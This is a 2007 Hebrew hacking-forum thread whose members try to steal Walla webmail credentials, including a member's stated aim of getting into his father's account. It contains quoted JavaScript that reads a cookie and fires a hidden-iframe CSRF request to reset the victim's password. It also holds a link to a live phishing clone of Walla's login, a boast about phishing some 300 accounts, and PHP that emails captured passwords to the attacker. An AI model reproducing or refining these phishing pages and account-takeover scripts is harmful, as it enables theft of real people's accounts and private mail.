אורח | עמוד ראשי :: אבטחת מידע :: פריצה לדואר של וואלה !

עמודים: 1 2
ההודעה נכתבה על-ידי k_rapper ב-30/09/2007 19:15:07
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
כיום האיימל של וואלה הוא בין המבוקשים לפריצה
מלא אנשים מחפשים מדריכים לפרוץ אליו
ומכיוון ורוב המדריכים שעובדים על שאר האימלים לא תקפים
לגביו חשבתי שבעזרת הנדסת תוכנה קטנה וקצת פישינג
יהיה אפשר לעשות פישינג לקטע של ההתחברות
בדיוק כמו שעשו פה לדברים אחרים :
http://security.kcsnet.net/shlomix/plus/Phishing/Phishing.html

ואז לרק לשנות את האיימל ולשלוח ולקבל את הסיסמא והשם משתמש של הבן אדם ...

אז ניסיתי עכשיו בחפיף לא הלך לי תכף אני ישב רציני ינסה שוב
כל מי שיכול לעזור ומעוניין לעשות איזה דף פישינג קטן
מוזמן לעלות לאתר ולשתף את כולם

שיהיה ערב טוב חברים
ההודעה נכתבה על-ידי SkOd ב-30/09/2007 22:19:42
SkOd

מנותק\ת

דרגה: משתמש רגיל
הודעות: 150
הרשמה: 08/02/2006
עזוב אותך פישינג. אפשר לפרוץ אימלים בוואלה
פשוט תמשיך לעבוד על זה.
ההודעה נכתבה על-ידי k_rapper ב-30/09/2007 22:29:03
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
איך ??
יש לך רעיון אחי חוץ מברוט פורס
שוט ! אני מקשיב ...
ההודעה נכתבה על-ידי k_rapper ב-30/09/2007 22:31:54
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
שימו לב זה קטע מתוך אחד המאמרים של קבוצת האקינג ikp
בנושא האיימל של וואלה :

קוד:
<html>
<script>
var last = document.cookie

var counter = ""
for (var i = 0; i < last.length; i++)
if (last.charAt(i) == "n")
if (last.charAt(i+1) == "i")
if (last.charAt(i+2) == "c")
if (last.charAt(i+3) == "k")
if (last.charAt(i+4) == "="){ j=i+5;
while (last.charAt(j+1) > "%"){
counter = counter + last.charAt(j)
j = j+1}}

for (var i=1 ; i<2 ;i++){
document.write("<iframe style=’position:absolute;visibility:hidden;’ src=http://friends.walla.co.il/ts.cgi?
tsscript=reg.commit&l=&status=1&edit=1&ReturnURL=http%3A%2F%2Fmail.walla.co.il
&username=",counter,"&password=oooo&passwordv=oooo&
hintq=question&hint=tanswer&DD=11&MM=1&YYYY=1999&email=aaa@mail.boo.il&
pharea=123&phnum=123456&fname=name&lname=fam&gender=2&cityname=scxzc&areacode=0&
vcard=&keywords=&homepage=&surffrom=0&occupation=0&education=0></iframe>")
}
setTimeout(’top.location.href="http://www.walla.co.il/?w=/friends/logout"’, 3000)
</script>
</html>


וניסיתי את זה זה לא עובד יש למישהו רעיון איך אפשר לערוך את זה ככה שזה יעבוד ??



ערכתי את השורה המעצבנת..

[ההודעה נערכה על-ידי devil kide ב-01/10/2007 20:55:15]

[ההודעה נערכה על-ידי devil kide ב-01/10/2007 20:55:43]
ההודעה נכתבה על-ידי antivirus ב-01/10/2007 11:55:05
antivirus

מנותק\ת

דרגה: משתמש רגיל
הודעות: 690
הרשמה: 11/12/2005
א: שמישהו יתקן את הבאג ויעשה פה גלישת שורות כדי שהעמוד לא יראה ככה

ב: פעם פרצתי בעזרת הנדסת אנוש ל300 אימיילים בוואלה איך? ככה!

יצרתי עמוד שרוב העבודה עליו (כמה ימים) הייתה בשביל הקוסמטיקה שלו שיראה בול של וואלה כל הקישורים בעמוד עבדו לוואלה כל הדברים הכי קטנים היו זהים קופי לוואלה
ואת העמוד הזה הכנסתי להודעת דוא"ל
והודעתי לכולם שהייתה נפילה בשרתים ויש פריצות וכל המשתמשים חייבים לשלוח פרטי התחברות לאתר וואלה כי רק ככה אפשר לאמת שהכתובת אמיתית ולא הדואר ימחק ותתפלאו אבל מאות אנשים שלחו לי את פרטי ההתחברות שלהם עכשיו מה שמצחיק זה שכבר עבר יובל מאז שעשיתי את זה ועד היום זה עובר ברשימות תפוצה של אנשים ואני מקבל עוד ועוד פרטי התחברות חחח


ההודעה נכתבה על-ידי T4uSBaZ ב-01/10/2007 12:24:42
T4uSBaZ

מנותק\ת

דרגה: משתמש רגיל
הודעות: 258
הרשמה: 01/08/2006
שמישו יתקן פה ת’גלישת שורות סעמק..


[ההודעה נערכה על-ידי T4uSBaZ ב-01/10/2007 12:26:22]
ההודעה נכתבה על-ידי Rx3vL0n ב-01/10/2007 12:24:44
Rx3vL0n

מנותק\ת

דרגה: משתמש רגיל
הודעות: 2553
הרשמה: 12/03/2006
לול אנשים הם הנקודה הכי חלשה באבטחת מידע



ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 19:20:20
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
antivirus אחי כבר יצרתי את כל הפישיניג זה לא היה קשה כולה צריך להוריד את הקוד מקור לשמור את זה עם התמונות ולהעלות לשרת החלק שאני לא מבין זה איפה בקוד מקור אני צריך לשנות ככה שברגע שהם ישימו את השם משתמש והסיסמא וילחצו על יתחבר זה ישלח לי לאיימל את השם משתמש והסיסמא שלהם ...
ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 19:28:46
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
הנה הדף פישינג שבניתי העלתי אותו סתם לנענע להמחשה אל תתייחסו לכתובת הלא הגיונית אני ישנה שרת ברגע שאני רק ידע איפה לשנות בקוד מקור כדי שזה ישלח לי לאיימל את השם משתמש והסיסמא
תראו את זה :
http://www.planetnana.co.il/rapper2008/friends.walla.co.il.htm
ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 19:30:53
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
אהה שכחתי להגיד שאם אתם לא רואים טוב את הכתב תשנו את הקידוד
לעיברית iso -logical
ההודעה נכתבה על-ידי devil kide ב-01/10/2007 21:01:32
devil kide

מנותק\ת

דרגה: מנהל ראשי
הודעות: 5275
הרשמה: 18/10/2005
מכיוון ש HTML לא יכול לשלוח אימיילים-תחפש את המידע שנשלח (השורה של השם משתמש והסיסמא) ותשךח אותם לדף אחר, באותו הדף תכתוב קוד בשפת צד שרת שישמור את המידע שנשלח...
למשל

קוד:
<?Php
$msg="Password:".$_POST[’pass’];
$mag.="email".$_POST[’mail’];
$msg="\n\r";
mail ($msg,"Walla Password","YourMail@server.com");
שגיאה בכניסה לאתר, נסה להתחבר שוב
?>


שישלח את לך אימייל עם שם משתמש וסיסמא...
כל מי שבא בטענות:שטלתי כמה טעויות בכוונה!


ההודעה נכתבה על-ידי k_rapper ב-01/10/2007 22:41:17
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
תודה אחי אני ינסה לחפש איפה
זה ולעשות את זה
ההודעה נכתבה על-ידי ShaDoW MaN ב-01/10/2007 23:43:09
ShaDoW MaN

מנותק\ת

דרגה: משתמש רגיל
הודעות: 100
הרשמה: 20/07/2007
פריצה לאימייל של וואלה לא כלכך מועיל..
אולי פה ושם לראות אימיילים של אנשים מכובדים..



ההודעה נכתבה על-ידי k_rapper ב-02/10/2007 01:38:48
k_rapper

מנותק\ת

דרגה: משתמש רגיל
הודעות: 12
הרשמה: 29/09/2007
אחי לי זה מועיל זה משהו ספיציפי אני צריך להיכנס לאיימל של אבא שלי
בעניין משפחתי דחוף ולבדוק כמה דברים
devil kid אני לחוץ בזמן ואני לא ממש מבין אתה יכול לעזור לי ולערוך את מה שרשמת ככה שזה יהיה טוב ולהסביר לי איפה לשים את זה בבקשה אני חייב את זה !
ההודעה נכתבה על-ידי devil kide ב-02/10/2007 12:45:23
devil kide

מנותק\ת

דרגה: מנהל ראשי
הודעות: 5275
הרשמה: 18/10/2005
אם זה המייל של אבא שלך זה יותר קל, בהנחה שהוא נכנס מהמחשב שאתה משתמש בו.



עמודים: 1 2

2001-2014 © Red-Board.co.il